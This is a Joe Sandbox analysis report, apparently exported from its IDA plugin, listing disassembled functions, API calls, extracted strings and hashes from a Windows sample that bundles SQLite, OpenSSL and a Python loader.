Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID: 00007D2010E148
String ID: %s mode not allowed: %s$access$cach$cach$cache$file$invalid uri authority: %.*s$localhos$mode$mode$no such %s mode: %s$no such vfs: %s
API String ID: 1405196051-1067337024
Opcode ID: 3f8308d3fd2b10f9cc1c487fd35f85b6cf851aebd3b3235ad9291f3a453954cb
Instruction ID: 8c848a1a3705cbce1b08813f078e2e411e3dff31d293b831dd632294bc781480
Opcode Fuzzy Hash: 3f8308d3fd2b10f9cc1c487fd35f85b6cf851aebd3b3235ad9291f3a453954cb
Instruction Fuzzy Hash: F3023B61B0C28645FB7D8B149830B796691AF6ABBDF0443B1EA7E4B6D8DE3DE441C301

Function 00007FFDFAF4D030 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 441COMMON

Download Yara Rule

APIs

00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAF4D6A7

Strings

misuse, xrefs: 00007FFDFAF4D0A2
%s at line %d of [%.10s], xrefs: 00007FFDFAF4D0AE
invalid, xrefs: 00007FFDFAF4D072
API call with %s database connection pointer, xrefs: 00007FFDFAF4D084
unopened, xrefs: 00007FFDFAF4D07D
NULL, xrefs: 00007FFDFAF4D05D
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FFDFAF4D095

Memory Dump Source

Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID: 00007D2010E148
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API call with %s database connection pointer$NULL$invalid$misuse$unopened
API String ID: 1405196051-509082904
Opcode ID: 58a3b1aaf38c9906b7e86a496d91b7c7a38e210a7ae96e3a1f486201c27cbd31
Instruction ID: 45871abe02abb7264065cc804e339d868c52764417746fd4f6249d6a1f27ac62
Opcode Fuzzy Hash: 58a3b1aaf38c9906b7e86a496d91b7c7a38e210a7ae96e3a1f486201c27cbd31
Instruction Fuzzy Hash: E4129021B09A4385FB689F15E460B7977A0BF41B98F584275EE6E0B6ECDF3DE5418300

Function 00007FFDF8553028 Relevance: 13.6, APIs: 9, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FFDF8553044
00007FFE148D1730.VCRUNTIME140 ref: 00007FFDF8553068
RtlCaptureContext.KERNEL32 ref: 00007FFDF8553071
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFDF855308B
RtlVirtualUnwind.KERNEL32 ref: 00007FFDF85530CC
00007FFE148D1730.VCRUNTIME140 ref: 00007FFDF85530FF
IsDebuggerPresent.KERNEL32 ref: 00007FFDF8553120
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFDF855313D
UnhandledExceptionFilter.KERNEL32 ref: 00007FFDF8553148

Memory Dump Source

Source File: 00000001.00000002.2194820535.00007FFDF8551000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF8550000, based on PE: true

Associated: 00000001.00000002.2194771737.00007FFDF8550000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2194820535.00007FFDF85B2000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2194820535.00007FFDF85FE000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2194820535.00007FFDF8602000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2194820535.00007FFDF8607000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2194820535.00007FFDF865F000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2194820535.00007FFDF8664000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2194820535.00007FFDF8667000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2195351397.00007FFDF8668000.00000080.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2195399422.00007FFDF8669000.00000004.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdf8550000_sB2ClgrGng.jbxd

Similarity

API ID: 00007D1730E148ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3906022758-0
Opcode ID: 077b0f214cb87451efc13930c849abf149ec882450af492fe5d50a1ac414abff
Instruction ID: e334443e7bcfa81efb8b66091aca6ff6db50cf40089973f531fa6bd3b5c66560
Opcode Fuzzy Hash: 077b0f214cb87451efc13930c849abf149ec882450af492fe5d50a1ac414abff
Instruction Fuzzy Hash: 5C316C76718B81CAEB618F60E8607EE3360FB85748F44403ADA5E4BBA9DF38D548C715

Function 00007FF6448783C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,00007FF644878919,00007FF644873F9D), ref: 00007FF64487842B
RemoveDirectoryW.KERNEL32(?,00007FF644878919,00007FF644873F9D), ref: 00007FF6448784AE
DeleteFileW.KERNEL32(?,00007FF644878919,00007FF644873F9D), ref: 00007FF6448784CD
FindNextFileW.KERNEL32(?,00007FF644878919,00007FF644873F9D), ref: 00007FF6448784DB
FindClose.KERNEL32(?,00007FF644878919,00007FF644873F9D), ref: 00007FF6448784EC
RemoveDirectoryW.KERNEL32(?,00007FF644878919,00007FF644873F9D), ref: 00007FF6448784F5

Strings

%s\*, xrefs: 00007FF6448783F2

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
String ID: %s\*
API String ID: 1057558799-766152087
Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
Instruction ID: bdff96ecf19b1bb6f1aff61b75035635b47a24be6078d4aa366f52dcaa5329e0
Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
Instruction Fuzzy Hash: 64411021B0CD46D9EA20BB64E8E61BA63A0FB94754F900232EE9DC36DCEF7DD5458740

Function 00007FFDFAED7316 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 332COMMON

Download Yara Rule

Strings

-x0, xrefs: 00007FFDFAED75E6
0123456789ABCDEF0123456789abcdef, xrefs: 00007FFDFAED7509
VUUU, xrefs: 00007FFDFAED744E
VUUU, xrefs: 00007FFDFAED757B

Memory Dump Source

Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID:
String ID: -x0$0123456789ABCDEF0123456789abcdef$VUUU$VUUU
API String ID: 0-2031831958
Opcode ID: 3073ff3188e9ee9edf11f2fc228c5f0a47d3828b9a10be925a8c8f8668dd9abb
Instruction ID: 7a83428554687c82b9cfd231e5ca5049f1fadffbd30106846ad06076edbcdefa
Opcode Fuzzy Hash: 3073ff3188e9ee9edf11f2fc228c5f0a47d3828b9a10be925a8c8f8668dd9abb
Instruction Fuzzy Hash: FCD13562B1D68285DB29AB18D0A4F7D7BA1FB44784F4A44B5DEAF437C9DE2EE400C700

Function 00007FF64487D12C Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF64487D148
RtlCaptureContext.KERNEL32 ref: 00007FF64487D175
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF64487D18F
RtlVirtualUnwind.KERNEL32 ref: 00007FF64487D1D0
IsDebuggerPresent.KERNEL32 ref: 00007FF64487D224
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF64487D241
UnhandledExceptionFilter.KERNEL32 ref: 00007FF64487D24C

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
Instruction ID: 625ac85325962cda5a6fd4c75934b7fa954b022cbb821c6a6661f7e51c7a068f
Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
Instruction Fuzzy Hash: D7311D7260CB81CAEB64AF60E8913EE63A4FB84744F44403ADA4E87B98DF79D548C710

Function 00007FF644895C00 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF644895C45

Part of subcall function 00007FF644895598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6448955AC

Part of subcall function 00007FF64488A948: RtlFreeHeap.NTDLL(?,?,?,00007FF644892D22,?,?,?,00007FF644892D5F,?,?,00000000,00007FF644893225,?,?,?,00007FF644893157), ref: 00007FF64488A95E
Part of subcall function 00007FF64488A948: GetLastError.KERNEL32(?,?,?,00007FF644892D22,?,?,?,00007FF644892D5F,?,?,00000000,00007FF644893225,?,?,?,00007FF644893157), ref: 00007FF64488A968

Part of subcall function 00007FF64488A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF64488A8DF,?,?,?,?,?,00007FF64488A7CA), ref: 00007FF64488A909
Part of subcall function 00007FF64488A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF64488A8DF,?,?,?,?,?,00007FF64488A7CA), ref: 00007FF64488A92E

_get_daylight.LIBCMT ref: 00007FF644895C34

Part of subcall function 00007FF6448955F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF64489560C

_get_daylight.LIBCMT ref: 00007FF644895EAA
_get_daylight.LIBCMT ref: 00007FF644895EBB
_get_daylight.LIBCMT ref: 00007FF644895ECC
GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF64489610C), ref: 00007FF644895EF3

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
String ID:
API String ID: 4070488512-0
Opcode ID: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
Instruction ID: 145fb6830e9407938e35f84bf17f59a8f148022e2e1c5078413f6604dd990ddb
Opcode Fuzzy Hash: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
Instruction Fuzzy Hash: 10D1A123A1CA428EE764BF25D8D21B96B51EF84B94F448135EE0DC7A9EDF3EE4418740

Function 00007FF64488A614 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF64488A68D
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF64488A6A5
RtlVirtualUnwind.KERNEL32 ref: 00007FF64488A6E0
IsDebuggerPresent.KERNEL32 ref: 00007FF64488A719
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF64488A723
UnhandledExceptionFilter.KERNEL32 ref: 00007FF64488A72E

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
Instruction ID: dca020750825312e0512b41a023a55c1df99d0a722e480da8df9dcd5d666469b
Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
Instruction Fuzzy Hash: CF31513660CF8189EB64EB65E8812AE73A4FB84754F540135EE9D83B98DF3DD145CB00

Function 00007FFDFF191CBC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 292COMMON

Download Yara Rule

Strings

..\s\ssl\statem\statem_srvr.c, xrefs: 00007FFDFF205DC9, 00007FFDFF205E76, 00007FFDFF205F8E, 00007FFDFF205FAE, 00007FFDFF206000, 00007FFDFF206079, 00007FFDFF206150
resumption, xrefs: 00007FFDFF205EAE
construct_stateful_ticket, xrefs: 00007FFDFF206144
tls_construct_new_session_ticket, xrefs: 00007FFDFF205DBD, 00007FFDFF205E6A, 00007FFDFF205FF4, 00007FFDFF20606D

Memory Dump Source

Source File: 00000001.00000002.2198558047.00007FFDFF191000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFF190000, based on PE: true

Associated: 00000001.00000002.2198504238.00007FFDFF190000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198558047.00007FFDFF212000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198558047.00007FFDFF214000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198558047.00007FFDFF23C000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198558047.00007FFDFF247000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198558047.00007FFDFF252000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198911802.00007FFDFF256000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198959360.00007FFDFF258000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff190000_sB2ClgrGng.jbxd

Similarity

API ID:
String ID: ..\s\ssl\statem\statem_srvr.c$construct_stateful_ticket$resumption$tls_construct_new_session_ticket
API String ID: 0-1194634662
Opcode ID: ef7342f60bc5b2d48a9fd6b8c6db10ef1ff12d171feaad55dce560bd1c9dc77c
Instruction ID: 05b2ac21bb49659d37cb58cb68a9ca046bbdf54da91c4ec577988bc3e090f16f
Opcode Fuzzy Hash: ef7342f60bc5b2d48a9fd6b8c6db10ef1ff12d171feaad55dce560bd1c9dc77c
Instruction Fuzzy Hash: 84D17E32B1878286F7109B25D460BA96760FB85B88F480236DE7CC7BDADF6DE541C750

Function 00007FF644891874 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6448918C0
FindFirstFileExW.KERNEL32 ref: 00007FF6448919CA

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
Instruction ID: 42465edde9679dc7cdadb9c7c662bb0e002e8e86ee19168b88f6c310d7881357
Opcode Fuzzy Hash: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
Instruction Fuzzy Hash: 5FB1C522B1CA9289FA61BB6199821B96391EF44BE5F445131EE5D87BCDEF3DE441C300

Function 00007FFDFF191EDD Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 461COMMON

Download Yara Rule

APIs

00007FFE1FFB08A0.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFDFF1EC2FA

Strings

tls_parse_ctos_psk, xrefs: 00007FFDFF1EC47C, 00007FFDFF1EC4CF, 00007FFDFF1EC5F0, 00007FFDFF1EC6CA, 00007FFDFF1EC729
..\s\ssl\statem\extensions_srvr.c, xrefs: 00007FFDFF1EC143, 00007FFDFF1EC488, 00007FFDFF1EC4D6, 00007FFDFF1EC5F7, 00007FFDFF1EC6D1, 00007FFDFF1EC730
D:\a\1\s\include\internal/packet.h, xrefs: 00007FFDFF1EC0F5, 00007FFDFF1EC109

Memory Dump Source

Source File: 00000001.00000002.2198558047.00007FFDFF191000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFF190000, based on PE: true

Associated: 00000001.00000002.2198504238.00007FFDFF190000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198558047.00007FFDFF212000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198558047.00007FFDFF214000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198558047.00007FFDFF23C000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198558047.00007FFDFF247000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198558047.00007FFDFF252000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198911802.00007FFDFF256000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198959360.00007FFDFF258000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff190000_sB2ClgrGng.jbxd

Similarity

API ID: 00007
String ID: ..\s\ssl\statem\extensions_srvr.c$D:\a\1\s\include\internal/packet.h$tls_parse_ctos_psk
API String ID: 3568877910-3130753023
Opcode ID: 1f5c165f081e2b630bbd1caa169cba93006ed19e963177b2c0bea09c2ce7ca5d
Instruction ID: bd2e9fc37e96fae8037c9aeef087eb1ebe3d3f038aef2a3aadf1ae97502fb2b6
Opcode Fuzzy Hash: 1f5c165f081e2b630bbd1caa169cba93006ed19e963177b2c0bea09c2ce7ca5d
Instruction Fuzzy Hash: C112AB63F0868282F7109B659864ABEA7A0EF85784F444236DE7D96BDEDF7CE441C700

Function 00007FF644895E7C Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF644895EAA

Part of subcall function 00007FF6448955F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF64489560C

_get_daylight.LIBCMT ref: 00007FF644895EBB

Part of subcall function 00007FF644895598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6448955AC

_get_daylight.LIBCMT ref: 00007FF644895ECC

Part of subcall function 00007FF6448955C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6448955DC

Part of subcall function 00007FF64488A948: RtlFreeHeap.NTDLL(?,?,?,00007FF644892D22,?,?,?,00007FF644892D5F,?,?,00000000,00007FF644893225,?,?,?,00007FF644893157), ref: 00007FF64488A95E
Part of subcall function 00007FF64488A948: GetLastError.KERNEL32(?,?,?,00007FF644892D22,?,?,?,00007FF644892D5F,?,?,00000000,00007FF644893225,?,?,?,00007FF644893157), ref: 00007FF64488A968

GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF64489610C), ref: 00007FF644895EF3

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 3458911817-0
Opcode ID: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
Instruction ID: 0efd6df8aaa5e2b1059a6020ef1ebdec738c6e2cd5ea03de9292157ad21c3828
Opcode Fuzzy Hash: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
Instruction Fuzzy Hash: 98514D32A1CA828EE760FF25E8D25A96761FF88794F404135EE4DC7A9ADF3DE4418740

Function 00007FFDFAEEC330 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 377COMMON

Download Yara Rule

Strings

, xrefs: 00007FFDFAEEC3BF
recovered %d frames from WAL file %s, xrefs: 00007FFDFAEEC888

Memory Dump Source

Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID:
String ID: $recovered %d frames from WAL file %s
API String ID: 0-3175670447
Opcode ID: cddca66f908f9aaa025682cee3071d9b9b50d36bb3716add2159b42f250d3a01
Instruction ID: 6c26d9984080e7fc4a36bff1635b2bf434f12fd28ca7725e8ec056fed6ce3585
Opcode Fuzzy Hash: cddca66f908f9aaa025682cee3071d9b9b50d36bb3716add2159b42f250d3a01
Instruction Fuzzy Hash: D4F1A436B1878686E768AF25D090B6E77A0F784B88F124075DE6E877D8DF39D844CB40

Function 00007FF644875830 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF644875840
GetLastError.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF644875852
GetProcAddress.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF644875889
GetLastError.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF64487589B
GetProcAddress.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF6448758B4
GetLastError.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF6448758C6
GetProcAddress.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF6448758DF
GetLastError.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF6448758F1
GetProcAddress.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF64487590D
GetLastError.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF64487591F
GetProcAddress.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF64487593B
GetLastError.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF64487594D
GetProcAddress.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF644875969
GetLastError.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF64487597B
GetProcAddress.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF644875997
GetLastError.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF6448759A9
GetProcAddress.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF6448759C5
GetLastError.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF6448759D7

Strings

PyConfig_SetString, xrefs: 00007FF644875A45, 00007FF644875A67
PyMarshal_ReadObjectFromString, xrefs: 00007FF644875C6D, 00007FF644875C8F
Failed to get address for %hs, xrefs: 00007FF644875861
PyErr_Print, xrefs: 00007FF644875B59, 00007FF644875B7B
PyConfig_SetWideStringList, xrefs: 00007FF644875A73, 00007FF644875A95
